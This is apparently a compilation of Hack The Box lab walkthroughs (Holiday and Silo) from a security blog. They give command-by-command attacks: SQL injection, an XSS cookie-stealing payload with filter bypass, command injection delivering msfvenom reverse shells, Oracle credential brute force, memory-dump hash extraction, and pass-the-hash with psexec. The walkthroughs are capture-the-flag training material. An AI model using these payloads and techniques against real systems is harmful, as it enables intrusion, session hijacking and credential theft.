• Click to share on Facebook (Opens in new window)
• Click to share on Google+ (Opens in new window)
Like this:
ABOUT THE AUTHOR

From <https://www.hackingarticles.in/hack-the-box-minion-walkthrough/>

Walkthroughs 2 Page 75
Holiday
Wednesday, January 2, 2019 7:14 PM

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense
is 10.10.10.25 so let’s begin with nmap port enumeration.
1 nmap -A -p- 10.10.10.25 --open
From given below image, you can observe we found port 22 and 8000 are open on
target system.

As port 8000 is running http we open the IP address in the browser, and find a
webpage.

Walkthroughs 2 Page 76
We didn’t find anything on the webpage so we use dirb to enumerate the directories.
1 dirb http://10.10.10.25:8000

Walkthroughs 2 Page 77
Dirb scan gives us a link to a directory called /login, we open the link and find a login
page.

We capture the login request using burpsuite. We use random credentials as


placeholder.

Walkthroughs 2 Page 78
We use sqlmap to check if it is vulnerable to sql injection. After finding that it is
vulnerable to sql injection, we use sqlmap to dump the database and find a username
“RickA” and password hash.
1 sqlmap -r sql.txt –dbms=SQLite -T users --columns --dump --batch

We use hashkiller.co.uk to decrypt the hash and find the password to the user.

We login using these credentials and we are redirected to a page with that looks like it
contains user information.

Walkthroughs 2 Page 79
contains user information.

We click on one of the UUID link and find a page that we can post notes for the users. It
also shows that it will take up to 1 minute to post the note.

Walkthroughs 2 Page 80
We try exploit the note function, and find it is vulnerable xss. As the notes are being
read by administrator xss can be used to get the admin cookie. To run xss and run our
payload we need to bypass the filter using java script function String.fromCharCode to
run our payload. I created this script here to convert string to ascii code.

We post the note to bypass the filter we have to use this payload:
1 <img src=”x/><script>eval(String.CharCode(<payload>));</script>”>

Walkthroughs 2 Page 81
We setup our listener using nc on port 80, as we will receive the the response of the
page including the administrator cookie on this port.
1 nc -lvp 80
After waiting for 1 minute we received the admin cookie.

The cookie is url encoded we decode and use it hijack the administrator session.

Walkthroughs 2 Page 82
The cookie is url encoded we decode and use it hijack the administrator session.

We capture the webpage’s request using burpsuite. We change our cookie with that of
administrator and forward it.

As soon as we forward the request, we are able to successfully hijack the administrator
session.

Walkthroughs 2 Page 83
session.

We now go to /admin directory and find a page where there are options to export
bookings and notes.

We capture the request using burpsuite, and check if it is vulnerable to any king of
injection. After enumerating we find that this page is vulnerable to command injection.

Walkthroughs 2 Page 84
We are unable to get a shell using web_delivery module of metaploit due to there being
filters. Now we create a payload using msfvenom to upload into the target machine
using command injection and get reverse shell.
1 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.14.8 lport=4444 –f elf > shell
After creating a shell, we create a python http server to upload into the target machine.

Now “.” Is not blacklisted so we convert the ipaddress into decimal number so that we
can bypass the filter.

We upload the shell using wget command into the target machine and save it in /tmp
directory.

Walkthroughs 2 Page 85
directory.

As soon as we run the command we get a prompt that shell is uploaded.

We give our payload read, write and execute permission using command injection.
Now we setup our listener using metasploit.
1 msf > use exploit/multi/handler
2 msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
3 msf exploit(multi/handler) > set lhost 10.10.14.8
4 msf exploit(multi/handler) > set lport 4444
5 msf exploit(multi/handler) > run

We run the shell using command injection vulnerability on the target machine.

As soon as we run the shell we get a reverse shell.

Walkthroughs 2 Page 86
As soon as we run the shell we get a reverse shell.

We spawn a tty shell and take a look at the sudoers list and find that we can run
/usr/bin/npm I * as root with no password.
1 python -c "import pty; pty.spawn('/bin/bash')"
2 sudo -l

Before trying to get root shell we first enumerate rest of the directories and find a file
called “user.txt” in /home/algernon directory. We take a look at the content of the files
and find the first flag.

Now we try to take root.txt we go to /app directory. We rename package.json to pack,


and symlink /root/root.txt package.json
1 ln -s /root/root.txt package.json

Walkthroughs 2 Page 87
We run /usr/bin/npm i * as root user and find the final flag.

After searching through google we find a way to get reverse shell using a package
called rimrafall.

We setup rimrafall by following the instructions given on the webpage.

Walkthroughs 2 Page 88
We setup rimrafall by following the instructions given on the webpage.

We setup the json file and change the preinstalled script to bash one liner.

We run the command as root user to get privileged shell.


1 sudo npm i rimrafall --unsafe

We setup the listener as soon as we run the preinstalled shell is getting executed we
get a reverse shell.
1 nc –nvlp 1234
We go to /root directory and find a file called root.txt. We take a look at the content of
the file and find the final flag.

Walkthroughs 2 Page 89
Author: Sayantan Bera is a technical writer at hacking articles and cyber security
enthusiast. Contact Here
Share this:
• Click to share on Twitter (Opens in new window)
• Click to share on Facebook (Opens in new window)
• Click to share on Google+ (Opens in new window)
Like this:

From <https://www.hackingarticles.in/hack-the-box-holiday-walkthrough/>

Walkthroughs 2 Page 90
Silo
Wednesday, January 2, 2019 7:14 PM

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Steps involved:
1. Post scanning to discover open ports
2. SID brute force
3. Credential brute force
4. Create payload
5. Setup listener
6. Upload shell with odat.py
7. Getting meterpreter shell
8. Finding user.txt
9. Downloading zip file from dropbox
10. Finding password hashes in memory dump
11. Privilege escalation using pass the hash technique
12. Finding root.txt
Since these labs are online available therefore they have static IP and IP of sense
is 10.10.10.82 so let’s begin with nmap port enumeration.
1 nmap -A 10.10.10.82
From given below image, you can observe we find only port 80, 135, 139, 445,
1521, 49152-49161 is open on target system.

Walkthroughs 2 Page 91
As port 80 is running http server we open the target machine’s ip address in our
browser, and find that it contains the default IIS page.

Walkthroughs 2 Page 92
We have oracle database listening remotely on port 1521, we need to find the valid SID
and credentials in order to connect to the database.
We first need to get the SID for the oracle service, so we use metasploit to brute force
the valid SID.
1 msf > use auxiliary/admin/oracle/sid_brute
2 msf auxiliary(admin/oracle/sid_brute) > set rhost 10.10.10.82
3 msf auxiliary(admin/oracle/sid_brute) > run

After finding the SID, we brute force the valid credentials using metasploit.
1 msf > use auxiliary/admin/oracle/oracle_login
2 msf auxiliary(admin/oracle/oracle_login) > set sid XE
3 msf auxiliary(admin/oracle/oracle_login) > set rhost 10.10.10.82
4 msf auxiliary(admin/oracle/oracle_login) > run

Walkthroughs 2 Page 93
We are unable to get a shell with reverse_tcp, so we use reverse_https payload. We
create a 64-bit payload as the nmap scan shows us that the Operating system is 64-bit
windows server.
1 msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.10.14.8 lport=443 -f aspx >
/tmp/Shell.aspx

We setup our listener before upload the payload to the target machine.
1 msf > use multi/handler
2 msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
3 msf exploit(multi/handler) > set lhost 10.10.14.8
4 msf exploit(multi/handler) > set lport 443
5 msf exploit(multi/handler) > run

We use this script called odat to further exploit the oracle database(you can download
the script here). As we have the valid credentials and the valid SID we use this to login
into the database and upload our asp shell in IIS default directory.
1 ./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "C:\inetpub
\wwwroot\\" shell.aspx /tmp/Shell.aspx --sysdba

Walkthroughs 2 Page 94
As soon as we run the shell on the target machine, we get a reverse shell.

Enumerating through the directories we find two files in “C:\Users\Phineas\Desktop”


called “user.txt” and “Oracle issue.txt”. We take a look at the content of user.txt and find
our first flag.

We take a look at the content of “Oracle issue.txt” and find a link to a dropbox and a
password in which the first char is not being rendered by kali linux.

Walkthroughs 2 Page 95
password in which the first char is not being rendered by kali linux.

We find the unrecognized character to be the pound symbol (£). We use the password
to login and find a zip file, we download the file into our system.

After downloading the zip file, we unzip it and find that it contains a memory dump. We
use volatility tool to investigate the dump.
1 volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist

Walkthroughs 2 Page 96
We now can dump the hashes by supplying the need address which is SYSTEM and
SAM.
1 volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 -y 0xffffc00000028000 -s
0xffffc00000619000

As we have the password hash for “Administrator” we use Pass the Hash technique to
get a privileged shell.
1 msf > use exploit/windows/smb/psexec
2 msf exploit(windows/smb/psexec) > set smbuser Administrator
3 msf exploit(windows/smb/psexec) > set smbpass <hash>
4 msf exploit(windows/smb/psexec) > set set rhost 10.10.10.82
5 msf exploit(windows/smb/psexec) > run

Walkthroughs 2 Page 97
After getting a privileged shell, inside “C:\Users\Administrator\Desktop” we find a file
called root.txt. We open root.txt and find the final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security
enthusiast. Contact Here
Share this:

From <https://www.hackingarticles.in/hack-the-box-silo-walkthrough/>

Walkthroughs 2 Page 98
Bart
Wednesday, January 2, 2019 7:14 PM

Walkthroughs 2 Page 99

You might also like